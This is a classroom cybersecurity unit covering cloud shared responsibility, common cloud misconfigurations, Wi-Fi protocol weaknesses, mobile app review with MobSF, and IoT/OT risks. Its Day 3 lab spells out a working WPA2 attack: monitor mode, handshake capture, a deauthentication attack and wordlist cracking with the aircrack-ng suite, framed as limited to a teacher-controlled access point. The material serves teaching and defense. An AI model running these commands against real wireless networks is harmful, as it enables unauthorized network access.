Blackbox Intelligence Group

Cybersecurity II · Module 11

Cybersecurity II, Unit 11: Cloud, Wireless, Mobile, and IoT Security

Beyond the data center perimeter: cloud shared responsibility done concretely (AWS / Azure / GCP), Wi-Fi attack categories, mobile threat models, and the IoT/OT realities that bite in 2025.

Length: 300 min
Level: intermediate
Track: Cyber II
Cadence: Semester 2


Built by an OSCP-certified instructor who teaches this material every week. Print-ready, classroom-tested, copy-paste-able.


Module overview


Unit 11: Cloud, Wireless, Mobile, and IoT Security

Lesson at a glance

| Item | Detail |
| --- | --- |
| Suggested length | 5 × 60 minutes |
| Recommended placement | Week 17 |
| Prerequisite | Cyber I Unit 9; Cyber II Unit 2 |
| Materials | AWS / Azure free-tier sandbox or simulated console (e.g., AWS Skill Builder labs), Wi-Fi adapter (lab only), Mobile Security Framework (MobSF), sample APK |

Safety: Cloud labs use personal sandbox accounts or teacher-provided lab accounts only. Wireless attacks are conducted only on the teacher-controlled lab AP, not on the school's network or any other Wi-Fi.

Standards & credential alignment

  • CSA Cloud Security Alliance core domains.
  • NIST SP 800-144 (cloud) and NIST SP 800-124 (mobile).
  • OWASP Mobile Top 10.
  • OffSec PEN-100 breadth coverage.

Learning objectives

By the end of this unit, students can:

  1. Apply the shared responsibility model concretely for IaaS, PaaS, SaaS with examples from AWS / Azure / GCP.
  2. Identify the top cloud misconfigurations (public S3, overprivileged IAM, exposed metadata, no MFA on root).
  3. Articulate Wi-Fi protocol generations and their weaknesses (WEP/WPA/WPA2/WPA3).
  4. Recognize mobile threat categories (insecure storage, unsafe IPC, broken crypto, M-in-M).
  5. Understand IoT/OT differences (uptime > confidentiality, legacy protocols, long lifecycles).
  6. Produce a one-page risk brief for a fictional company's hybrid environment.

Vocabulary

  • IaaS / PaaS / SaaS - Infrastructure / Platform / Software as a Service.
  • Shared responsibility - Provider handles security "of" the cloud; customer handles security "in" it.
  • IAM - Identity and Access Management.
  • IMDS - Instance Metadata Service.
  • WEP/WPA/WPA2/WPA3 - Wi-Fi protocol generations.
  • PMKID / handshake - Wi-Fi authentication artifacts attackers target.
  • MDM - Mobile Device Management.
  • OT / ICS / SCADA - Operational Technology / Industrial Control / Supervisory Control & Data Acquisition.

Pacing

| Day | Focus | Deliverable |
| --- | --- | --- |
| 1 | Cloud shared responsibility + IAM | Filled responsibility matrix |
| 2 | Top cloud misconfigurations | 5 documented findings |
| 3 | Wireless basics + lab | Captured handshake (lab only) + analysis |
| 4 | Mobile + MobSF | MobSF report on sample APK |
| 5 | IoT / OT realities + risk brief | 1-page risk brief |

Day 1 - Shared responsibility

Matrix template (filled in class for IaaS / PaaS / SaaS):

| | Physical | Network | OS | Runtime | Application | Data | Identity |
| --- | --- | --- | --- | --- | --- | --- | --- |
| IaaS | Provider | Shared | Customer | Customer | Customer | Customer | Customer |
| PaaS | Provider | Provider | Provider | Provider | Customer | Customer | Customer |
| SaaS | Provider | Provider | Provider | Provider | Provider | Customer | Customer |

IAM concepts:

  • Principle of least privilege.
  • No long-lived access keys for humans.
  • MFA on root and privileged accounts.
  • Roles > users for workloads.
  • Conditional access where supported.

Day 2 - Top cloud misconfigurations

Walk through (with sandbox demos where possible):

  1. Public S3 bucket / Azure Blob anonymous read enabled.
  2. Overprivileged IAM (AdministratorAccess for application service accounts).
  3. SSRF + IMDSv1 → cloud creds extraction (concept; do not exploit anything outside the lab).
  4. No MFA on root / break-glass account.
  5. Exposed RDP/SSH to 0.0.0.0/0 in security group.
  6. CloudTrail / Activity Log disabled.
  7. Long-lived access keys committed to GitHub.

Tooling to discuss: AWS IAM Access Analyzer, ScoutSuite, Prowler, Microsoft Defender for Cloud, Wiz / Orca (commercial CSPM).

Day 3 - Wireless

Concepts:

  • WEP - broken; never deploy.
  • WPA-TKIP - broken-ish; deprecated.
  • WPA2-PSK - vulnerable to offline cracking of weak PSKs after handshake capture.
  • WPA2-Enterprise (EAP) - much stronger.
  • WPA3-SAE - modern; not magic, but better.

Lab exercise (teacher-controlled AP only, with explicit pre-class authorization):

```bash
# Identify lab interface
iw dev

# Monitor mode (lab adapter only)
sudo airmon-ng start wlan0

# Watch
sudo airodump-ng wlan0mon

# Capture handshake from teacher AP
sudo airodump-ng -c <ch> --bssid <lab-ap-bssid> -w lab-cap wlan0mon
# Force a re-auth using the teacher's lab client
sudo aireplay-ng -0 1 -a <lab-ap-bssid> -c <lab-client> wlan0mon

# Crack against teacher-issued wordlist
aircrack-ng -w teacher-wordlist.txt -b <lab-ap-bssid> lab-cap-01.cap
```

Defensive lessons:

  • Strong PSK or move to enterprise.
  • 802.11w (Management Frame Protection).
  • Network segmentation for guest Wi-Fi.

Day 4 - Mobile + MobSF

Run MobSF on a sample APK provided by the teacher. Walk through the report:

  • Permissions requested vs. needed.
  • Insecure storage findings (SharedPreferences plaintext).
  • Hardcoded secrets.
  • Network security config (cleartext allowed?).
  • TLS pinning presence.
  • WebView with setJavaScriptEnabled(true) + addJavascriptInterface.

Discuss OWASP Mobile Top 10. Discuss MDM controls (compliance policy, conditional access, app protection policies).
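
To make the "cleartext allowed?" and "TLS pinning presence" report items concrete, the sketch below audits an Android `network_security_config.xml` by hand. It is an added example, not MobSF's own logic or part of the original lesson pack; the sample XML, domains and pin value are constructed, and `platform_default_cleartext` is a hypothetical parameter standing in for the platform default when the file does not set the attribute.

```python
import xml.etree.ElementTree as ET

# Constructed res/xml/network_security_config.xml for a hypothetical sample app.
SAMPLE_CONFIG = """<network-security-config>
  <base-config cleartextTrafficPermitted="true">
    <trust-anchors>
      <certificates src="system"/>
      <certificates src="user"/>
    </trust-anchors>
  </base-config>
  <domain-config cleartextTrafficPermitted="false">
    <domain includeSubdomains="true">api.example.com</domain>
    <pin-set expiration="2026-01-01">
      <pin digest="SHA-256">CONSTRUCTED_PLACEHOLDER_PIN=</pin>
    </pin-set>
  </domain-config>
  <domain-config>
    <domain>legacy.example.com</domain>
  </domain-config>
</network-security-config>"""

def audit_network_config(xml_text, platform_default_cleartext=False):
    """Return (scope, finding) pairs. Only top-level domain-config is handled."""
    root = ET.fromstring(xml_text)
    findings = []
    base = root.find("base-config")
    base_clear = platform_default_cleartext
    if base is not None:
        attr = base.get("cleartextTrafficPermitted")
        if attr is not None:
            base_clear = attr == "true"
        # Trusting user-installed CAs lets an on-device proxy certificate intercept TLS.
        if base.find("trust-anchors/certificates[@src='user']") is not None:
            findings.append(("base-config", "trusts user-installed CAs"))
    if base_clear:
        findings.append(("base-config", "cleartext allowed"))
    for dc in root.findall("domain-config"):
        scope = ",".join((d.text or "").strip() for d in dc.findall("domain"))
        attr = dc.get("cleartextTrafficPermitted")
        # An unset attribute inherits from base-config, which is easy to miss in review.
        clear = base_clear if attr is None else attr == "true"
        if clear:
            findings.append((scope, "cleartext allowed"))
        if dc.find("pin-set/pin") is None:
            findings.append((scope, "no certificate pins"))
    return findings
```

The `legacy.example.com` entry sets nothing itself yet still ends up with cleartext allowed, because it inherits the permissive base configuration.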

Day 5 - IoT / OT + risk brief

Realities:

  • Uptime > confidentiality in OT (you can't reboot a turbine).
  • Long lifecycles (15–25 years).
  • Legacy protocols (Modbus, DNP3, S7) without authentication.
  • Air-gap myths.
  • Patch windows measured in months, not minutes.

Categories:

  • Consumer IoT (cameras, doorbells) - usually weak by default.
  • Industrial IoT (sensors, PLCs) - segmented; specialized monitoring.
  • Building / HVAC - frequently overlooked; often the pivot point in real breaches (Target HVAC).

Risk brief assignment:

  • Fictional company "AcmeWidgets" has: AWS prod environment, Azure AD identity, employee laptops with MDM, contractor BYOD phones, factory floor with Modbus PLCs and a Windows 7 HMI.
  • Write 1 page: top 5 risks, top 5 mitigations.

Common misconceptions

  • "Cloud means the provider handles security." - They handle security "of" the cloud. You handle security "in" it.
  • "WPA3 is unhackable." - Stronger, not invincible. Still vulnerable to weak passwords and side channels in some implementations.
  • "OT can't be patched, so don't bother." - Patching strategies in OT exist; they look different (windows, vendor coordination, compensating controls).

Assessment

  • Day 1 matrix.
  • Day 2 documented findings.
  • Day 3 capture + analysis paragraph.
  • Day 4 MobSF report.
  • Day 5 risk brief.

Career connection

Cloud security engineers $120K–$180K. OT/ICS security $130K–$200K (acute shortage). Mobile AppSec $100K–$160K.

Homework

Read CISA's "Securing OT" advisory. Pick one recommendation; write 2 paragraphs on why it matters and what blocks adoption.
